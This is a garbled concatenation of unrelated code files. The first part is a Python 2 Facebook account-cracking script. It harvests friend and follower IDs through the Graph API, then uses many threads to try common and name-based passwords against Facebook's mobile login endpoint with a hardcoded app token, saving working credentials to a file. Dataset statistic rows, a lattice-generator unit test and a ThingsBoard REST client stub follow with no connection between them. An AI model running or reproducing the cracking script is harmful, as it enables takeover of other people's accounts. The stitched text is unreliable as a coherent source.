if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass6+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass6+"\n")
cp.close()
cps.append(uid+pass6)
else:
pass7 = name.lower()
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass7, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass7+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass7+"\n")
ok.close()
oks.append(uid+pass7)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass7+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass7+"\n")
cp.close()
cps.append(uid+pass7)
else:
pass8 = name.lower().split(' ')[0] + name.lower().split(' ')[1]
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass8, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass8+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass8+"\n")
ok.close()
oks.append(uid+pass8)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass8+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass8+"\n")
cp.close()
cps.append(uid+pass8)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print("")
linex()
print("")
print("\033[92;1m THE PROCESS HAS BEEN COMPLETED")
print("\033[93;1m TOTAL \033[92;1mOK\033[93;1m/\033[91;1mCP: "+str(len(oks))+"/"+str(len(cps)))
print("")
linex()
print("")
raw_input("\033[93;1m PRESS ENTER TO BACK ")
menu()
global token
os.system("clear")
try:
token = open("vau_token.txt","r").read()
except IOError:
print("")
print("\t\033[91;1m TOKEN NOT FOUND ")
time.sleep(1)
fb_token()
os.system("clear")
logo()
print("")
print("\t\033[93;1m DIGIT PASS CRACKING")
print("")
print("\033[94;1m [1] CRACK PUBLIC ID")
print("\033[93;1m [2] CRACK FOLLOWERS")
print("\033[92;1m [3] CRACK FILE")
print("")
crack_select()
select = raw_input("\033[92;1m CHOOSE : ")
id=[]
oks=[]
cps=[]
if select =="1":
os.system("clear")
logo()
print("")
print("\t\033[93;1m DIGIT PASS CRACKING")
print("")
try:
id_limit = int(raw_input("\033[93;1m ENTER LIMIT (\033[91;1m5 MAX\033[93;1m): \033[92;1m"))
print("")
except:id_limit=1
for t in range(id_limit):
t +=1
idt = raw_input("\033[93;1m INPUT PUBLIC ID (\033[92;1m%s\033[93;1m) : \033[92;1m"%(t))
try:
for i in requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+token).json()["data"]:
uid = i["id"].encode('utf-8')
na = i["name"].encode('utf-8')
id.append(uid+"|"+na)
except KeyError:
print("\033[91;1m PRIVATE FRIEND LIST TRY ANOTHER ONE")
print("\033[94;1m TOTAL IDS : \033[0;92m%s\033[0;97m"%(len(id)))
time.sleep(3)
elif select =="2":
os.system("clear")
logo()
print("")
print("\t\033[93;1m DIGIT PASS CRACKING")
print("")
try:
id_limit = int(raw_input("\033[93;1m ENTER LIMIT (\033[91;1m5 MAX\033[93;1m): \033[92;1m"))
print("")
except:id_limit=1
for t in range(id_limit):
t +=1
idt = raw_input("\033[93;1m INPUT FOLLOWER ID (\033[92;1m%s\033[93;1m) : \033[92;1m"%(t))
try:
for i in requests.get("https://graph.facebook.com/"+idt+"/subscribers?access_token="+token+"&limit=999999").json()["data"]:
uid = i["id"].encode('utf-8')
na = i["name"].encode('utf-8')
id.append(uid+"|"+na)
except KeyError:
print("\033[91;1m PRIVATE FRIEND LIST TRY ANOTHER ONE")
print("\033[94;1m TOTAL IDS : \033[0;92m%s\033[0;97m"%(len(id)))
time.sleep(3)
elif select =="3":
os.system("clear")
logo()
print("")
print("\t\033[93;1m DIGIT PASS CRACKING")
print("")
filelist = raw_input('\033[92;1m INPUT FILE: ')
try:
for line in open(filelist, 'r').readlines():
id.append(line.strip())
except IOError:
print("\t\033[91;1m REQUESTED FILE NOT FOUND")
print("")
raw_input("\033[93;1m PRESS ENTER TO BACK")
crack()
elif select =="0":
menu()
else:
print("")
print("\t\033[91;1m SELECT VALID OPTION")
print("")
crack_select()
os.system("clear")
logo()
print("")
print("\033[93;1m TOTAL IDS : \033[92;1m"+str(len(id)))
print("\033[92;1m BRUTE HAS BEEN STARTED\x1b[0m")
linex()
def main(arg):
user=arg
uid,name=user.split("|")
_azimua = random.choice(["Mozilla/5.0 (Linux; Android 10; Redmi Note 8 Pro Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.106 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/275.0.0.49.127;]", "[FBAN/FB4A;FBAV/246.0.0.49.121;FBBV/181448449;FBDM/{density=1.5,width=540,height=960};FBLC/en_US;FBRV/183119516;FBCR/TM;FBMF/vivo;FBBD/vivo;FBPN/com.facebook.katana;FBDV/vivo 1606;FBSV/6.0.1;FBOP/1;FBCA/armeabi-v7a:armeabi;]", "Dalvik/2.1.0 (Linux; U; Android 5.1.1; SM-J320F Build/LMY47V) [FBAN/FB4A;FBAV/43.0.0.29.147;FBPN/com.facebook.katana;FBLC/en_GB;FBBV/14274161;FBCR/Tele2 LT;FBMF/samsung;FBBD/samsung;FBDV/SM-J320F;FBSV/5.0;FBCA/armeabi-v7a:armeabi;FBDM/{density=3.0,width=1080,height=1920};FB_FW/1;]", "Mozilla/5.0 (Linux; Android 5.1.1; A37f Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/305.1.0.40.120;]", "Mozilla/5.0 (Linux; Android 10; REALME RMX1911 Build/NMF26F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 AlohaBrowser/2.20.3", "Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E216 [FBAN/FBIOS;FBAV/170.0.0.60.91;FBBV/105964764;FBDV/iPhone10,1;FBMD/iPhone;FBSN/iOS;FBSV/11.3;FBSS/2;FBCR/Sprint;FBID/phone;FBLC/en_US;FBOP/5;FBRV/106631002]", "Mozilla/5.0 (Linux; Android 7.1.1; ASUS Chromebook Flip C302 Build/R70-11021.56.0; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Safari/537.36 [FB_IAB/FB4A;FBAV/198.0.0.53.101;]"])
try:
pass1 = "balochistan"
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass1, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass1+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass1+"\n")
ok.close()
oks.append(uid+pass1)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass1+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass1+"\n")
cp.close()
cps.append(uid+pass1)
else:
pass2 = "yaalimadad"
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass2, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass2+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass2+"\n")
ok.close()
oks.append(uid+pass2)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass2+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass2+"\n")
cp.close()
cps.append(uid+pass2)
else:
pass3 = "pakistan123"
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass3, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass3+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass3+"\n")
ok.close()
oks.append(uid+pass3)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass3+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass3+"\n")
cp.close()
cps.append(uid+pass3)
else:
pass4 = "khankhan"
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass4, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass4+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass4+"\n")
ok.close()
oks.append(uid+pass4)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass4+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass4+"\n")
cp.close()
cps.append(uid+pass4)
else:
pass5 = "786110"
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass5, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass5+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass5+"\n")
ok.close()
oks.append(uid+pass5)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass5+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass5+"\n")
cp.close()
cps.append(uid+pass5)
else:
pass6 = "khan1234"
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass6, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass6+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass6+"\n")
ok.close()
oks.append(uid+pass6)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass6+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass6+"\n")
cp.close()
cps.append(uid+pass6)
else:
pass7 = "baloch1234"
api = 'https://b-api.facebook.com/method/auth.login'
params = {'access_token': '350685531728%7C62f8ce9f74b12f84c123cc23437a4a32', 'format': 'JSON', 'sdk_version': '2', 'email': uid, 'locale': 'en_US', 'password': pass7, 'sdk': 'ios', 'generate_session_cookies': '1', 'sig': '3f555f99fb61fcd7aa0c44f58f522ef6'}
headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 'x-fb-net-hni': str(random.randint(20000, 40000)), 'x-fb-connection-quality': 'EXCELLENT', 'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 'user-agent': _azimua, 'content-type': 'application/x-www-form-urlencoded', 'x-fb-http-engine': 'Liger'}
data = requests.get(api, params=params, headers=headers_)
if "access_token" in data.text and "EAAA" in data.text:
print(" \033[1;32m[AGHA-OK] "+uid+" | "+pass7+"\033[0;97m")
ok = open("ok.txt", "a")
ok.write(uid+"|"+pass7+"\n")
ok.close()
oks.append(uid+pass7)
else:
if "www.facebook.com" in data.json()['error_msg']:
print(" \033[1;33m[AGHA-CP] "+uid+" | "+pass7+"\033[0;97m")
cp = open("cp.txt", "a")
cp.write(uid+"|"+pass7+"\n")
cp.close()
cps.append(uid+pass7)
except:
pass
p = ThreadPool()
p.map(main, id)
print("")
linex()
print("")
print("\033[92;1m THE PROCESS HAS BEEN COMPLETED")
print("\033[93;1m TOTAL \033[92;1mOK\033[93;1m/\033[91;1mCP: "+str(len(oks))+"/"+str(len(cps)))
print("")
linex()
print("")
raw_input("\033[93;1m PRESS ENTER TO BACK ")
menu()
if __name__ == '__main__':
main()
| 26.42268
| 1,581
| 0.595089
| 5,119
| 35,882
| 4.124438
| 0.095526
| 0.012788
| 0.027708
| 0.026998
| 0.897741
| 0.890494
| 0.875006
| 0.86847
| 0.866007
| 0.860702
| 0
| 0.132733
| 0.202135
| 35,882
| 1,357
| 1,582
| 26.442152
| 0.604736
| 0
| 0
| 0.856467
| 0
| 0.053628
| 0.456279
| 0.16188
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.206625
| 0.003155
| null | null | 0.22082
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
e6be894e085ab9552de67a627a0d6f2950224567
| 7,104
|
py
|
Python
|
atoman/lattice_gen/tests/test_lattice_gen_pu3ga.py
|
chrisdjscott/Atoman
|
e87ac31bbdcf53bb8f3efdfb109787d604890394
|
[
"MIT"
] | 9
|
2015-11-23T12:13:34.000Z
|
2021-11-18T05:23:35.000Z
|
atoman/lattice_gen/tests/test_lattice_gen_pu3ga.py
|
chrisdjscott/Atoman
|
e87ac31bbdcf53bb8f3efdfb109787d604890394
|
[
"MIT"
] | 1
|
2017-07-17T20:27:50.000Z
|
2017-07-23T05:27:15.000Z
|
atoman/lattice_gen/tests/test_lattice_gen_pu3ga.py
|
chrisdjscott/Atoman
|
e87ac31bbdcf53bb8f3efdfb109787d604890394
|
[
"MIT"
] | 4
|
2015-11-23T12:13:37.000Z
|
2017-05-03T08:24:19.000Z
|
"""
Unit tests for the Pu-Ga (Pu3Ga method) lattice generator
"""
from __future__ import absolute_import
from __future__ import unicode_literals
import unittest
import numpy as np
from ...system.lattice import Lattice
from .. import lattice_gen_pu3ga
################################################################################
class TestLatticeGenPu3Ga(unittest.TestCase):
"""
Test Pu-Ga (Pu3Ga method) lattice generator
"""
def setUp(self):
self.generator = lattice_gen_pu3ga.Pu3GaLatticeGenerator()
def tearDown(self):
self.generator = None
def test_latticeGenPu3GaPBC(self):
"""
Pu3Ga lattice generator (PBCs)
"""
# 5 percent
args = lattice_gen_pu3ga.Args(percGa=5, NCells=[2, 2, 2], a0=3.0, pbcx=True, pbcy=True, pbcz=True)
status, lattice = self.generator.generateLattice(args)
pos = np.asarray([ 0. , 0. , 0. , 0. , 1.5, 1.5, 1.5, 0. , 1.5, 1.5, 1.5,
0. , 0. , 0. , 3. , 0. , 1.5, 4.5, 1.5, 0. , 4.5, 1.5,
1.5, 3. , 0. , 3. , 0. , 0. , 4.5, 1.5, 1.5, 3. , 1.5,
1.5, 4.5, 0. , 0. , 3. , 3. , 0. , 4.5, 4.5, 1.5, 3. ,
4.5, 1.5, 4.5, 3. , 3. , 0. , 0. , 3. , 1.5, 1.5, 4.5,
0. , 1.5, 4.5, 1.5, 0. , 3. , 0. , 3. , 3. , 1.5, 4.5,
4.5, 0. , 4.5, 4.5, 1.5, 3. , 3. , 3. , 0. , 3. , 4.5,
1.5, 4.5, 3. , 1.5, 4.5, 4.5, 0. , 3. , 3. , 3. , 3. ,
4.5, 4.5, 4.5, 3. , 4.5, 4.5, 4.5, 3. ])
numatom = 32
gacnt = int(args.percGa * 0.01 * float(numatom))
self.assertEqual(status, 0)
self.assertIsInstance(lattice, Lattice)
self.assertEqual(lattice.NAtoms, numatom)
self.assertTrue(np.allclose(lattice.pos, pos))
self.assertEqual(len(lattice.specieList), 2)
self.assertEqual(lattice.specieList[0], "Pu")
self.assertEqual(lattice.specieList[1], "Ga")
self.assertEqual(len(lattice.specieCount), 2)
self.assertEqual(lattice.specieCount[0], numatom - gacnt)
self.assertEqual(lattice.specieCount[1], gacnt)
self.assertEqual(len([x for x in lattice.specie if x == 0]), numatom - gacnt)
self.assertEqual(len([x for x in lattice.specie if x == 1]), gacnt)
self.assertTrue(np.allclose(lattice.cellDims, [6,6,6]))
# 2 percent
args = lattice_gen_pu3ga.Args(percGa=2, NCells=[2, 2, 2], a0=3.0, pbcx=True, pbcy=True, pbcz=True)
status, lattice = self.generator.generateLattice(args)
numatom = 32
gacnt = int(args.percGa * 0.01 * float(numatom))
self.assertEqual(status, 0)
self.assertIsInstance(lattice, Lattice)
self.assertEqual(lattice.NAtoms, numatom)
self.assertTrue(np.allclose(lattice.pos, pos))
self.assertEqual(len(lattice.specieList), 2)
self.assertEqual(lattice.specieList[0], "Pu")
self.assertEqual(lattice.specieList[1], "Ga")
self.assertEqual(len(lattice.specieCount), 2)
self.assertEqual(lattice.specieCount[0], numatom - gacnt)
self.assertEqual(lattice.specieCount[1], gacnt)
self.assertEqual(len([x for x in lattice.specie if x == 0]), numatom - gacnt)
self.assertEqual(len([x for x in lattice.specie if x == 1]), gacnt)
self.assertTrue(np.allclose(lattice.cellDims, [6,6,6]))
def test_latticeGenPu3GaNoPBC(self):
"""
Pu3Ga lattice generator (no PBCs)
"""
args = lattice_gen_pu3ga.Args(percGa=5, NCells=[1, 3, 2], a0=3.0, pbcx=False, pbcy=False, pbcz=False)
status, lattice = self.generator.generateLattice(args)
pos = np.asarray([ 0. , 0. , 0. , 0. , 1.5, 1.5, 1.5, 0. , 1.5, 1.5, 1.5,
0. , 0. , 0. , 3. , 0. , 1.5, 4.5, 1.5, 0. , 4.5, 1.5,
1.5, 3. , 0. , 0. , 6. , 1.5, 1.5, 6. , 0. , 3. , 0. ,
0. , 4.5, 1.5, 1.5, 3. , 1.5, 1.5, 4.5, 0. , 0. , 3. ,
3. , 0. , 4.5, 4.5, 1.5, 3. , 4.5, 1.5, 4.5, 3. , 0. ,
3. , 6. , 1.5, 4.5, 6. , 0. , 6. , 0. , 0. , 7.5, 1.5,
1.5, 6. , 1.5, 1.5, 7.5, 0. , 0. , 6. , 3. , 0. , 7.5,
4.5, 1.5, 6. , 4.5, 1.5, 7.5, 3. , 0. , 6. , 6. , 1.5,
7.5, 6. , 0. , 9. , 0. , 1.5, 9. , 1.5, 0. , 9. , 3. ,
1.5, 9. , 4.5, 0. , 9. , 6. , 3. , 0. , 0. , 3. , 1.5,
1.5, 3. , 0. , 3. , 3. , 1.5, 4.5, 3. , 0. , 6. , 3. ,
3. , 0. , 3. , 4.5, 1.5, 3. , 3. , 3. , 3. , 4.5, 4.5,
3. , 3. , 6. , 3. , 6. , 0. , 3. , 7.5, 1.5, 3. , 6. ,
3. , 3. , 7.5, 4.5, 3. , 6. , 6. , 3. , 9. , 0. , 3. ,
9. , 3. , 3. , 9. , 6. ])
numatom = 53
gacnt = int(args.percGa * 0.01 * float(numatom))
self.assertEqual(status, 0)
self.assertIsInstance(lattice, Lattice)
self.assertEqual(lattice.NAtoms, numatom)
self.assertTrue(np.allclose(lattice.pos, pos))
self.assertEqual(len(lattice.specieList), 2)
self.assertEqual(lattice.specieList[0], "Pu")
self.assertEqual(lattice.specieList[1], "Ga")
self.assertEqual(len(lattice.specieCount), 2)
self.assertEqual(lattice.specieCount[0], numatom - gacnt)
self.assertEqual(lattice.specieCount[1], gacnt)
self.assertEqual(len([x for x in lattice.specie if x == 0]), numatom - gacnt)
self.assertEqual(len([x for x in lattice.specie if x == 1]), gacnt)
self.assertTrue(np.allclose(lattice.cellDims, [3,9,6]))
# 11 percent
args = lattice_gen_pu3ga.Args(percGa=11, NCells=[1, 3, 2], a0=3.0, pbcx=False, pbcy=False, pbcz=False)
status, lattice = self.generator.generateLattice(args)
numatom = 53
gacnt = int(args.percGa * 0.01 * float(numatom))
self.assertEqual(status, 0)
self.assertIsInstance(lattice, Lattice)
self.assertEqual(lattice.NAtoms, numatom)
self.assertTrue(np.allclose(lattice.pos, pos))
self.assertEqual(len(lattice.specieList), 2)
self.assertEqual(lattice.specieList[0], "Pu")
self.assertEqual(lattice.specieList[1], "Ga")
self.assertEqual(len(lattice.specieCount), 2)
self.assertEqual(lattice.specieCount[0], numatom - gacnt)
self.assertEqual(lattice.specieCount[1], gacnt)
self.assertEqual(len([x for x in lattice.specie if x == 0]), numatom - gacnt)
self.assertEqual(len([x for x in lattice.specie if x == 1]), gacnt)
self.assertTrue(np.allclose(lattice.cellDims, [3,9,6]))
| 49.678322
| 110
| 0.496059
| 968
| 7,104
| 3.615702
| 0.082645
| 0.033143
| 0.031714
| 0.021714
| 0.858571
| 0.85
| 0.831429
| 0.808857
| 0.762
| 0.762
| 0
| 0.100295
| 0.331926
| 7,104
| 142
| 111
| 50.028169
| 0.637168
| 0.027872
| 0
| 0.647619
| 0
| 0
| 0.002377
| 0
| 0
| 0
| 0
| 0
| 0.495238
| 1
| 0.038095
| false
| 0
| 0.057143
| 0
| 0.104762
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e6c38fefb5a1ed60cf56288129ededb117761170
| 22,392
|
py
|
Python
|
tb_rest_client/api/api_ce/audit_log_controller_api.py
|
maksonlee/python_tb_rest_client
|
a6cd17ef4de31f68c3226b7a9835292fbac4b1fa
|
[
"Apache-2.0"
] | 1
|
2021-07-19T10:09:04.000Z
|
2021-07-19T10:09:04.000Z
|
tb_rest_client/api/api_ce/audit_log_controller_api.py
|
moravcik94/python_tb_rest_client
|
985361890cdf4ccce93d2b24905ad9003c8dfcaa
|
[
"Apache-2.0"
] | null | null | null |
tb_rest_client/api/api_ce/audit_log_controller_api.py
|
moravcik94/python_tb_rest_client
|
985361890cdf4ccce93d2b24905ad9003c8dfcaa
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
# Copyright 2020. ThingsBoard
# #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# #
# http://www.apache.org/licenses/LICENSE-2.0
# #
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from tb_rest_client.api_client import ApiClient
class AuditLogControllerApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_audit_logs_by_customer_id_using_get(self, customer_id, limit, **kwargs): # noqa: E501
"""getAuditLogsByCustomerId # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_audit_logs_by_customer_id_using_get(customer_id, limit, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str customer_id: customerId (required)
:param str limit: limit (required)
:param int start_time: startTime
:param int end_time: endTime
:param bool asc_order: ascOrder
:param str offset: offset
:param str action_types: actionTypes
:return: TimePageDataAuditLog
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_audit_logs_by_customer_id_using_get_with_http_info(customer_id, limit, **kwargs) # noqa: E501
else:
(data) = self.get_audit_logs_by_customer_id_using_get_with_http_info(customer_id, limit, **kwargs) # noqa: E501
return data
def get_audit_logs_by_customer_id_using_get_with_http_info(self, customer_id, limit, **kwargs): # noqa: E501
"""getAuditLogsByCustomerId # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_audit_logs_by_customer_id_using_get_with_http_info(customer_id, limit, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str customer_id: customerId (required)
:param str limit: limit (required)
:param int start_time: startTime
:param int end_time: endTime
:param bool asc_order: ascOrder
:param str offset: offset
:param str action_types: actionTypes
:return: TimePageDataAuditLog
If the method is called asynchronously,
returns the request thread.
"""
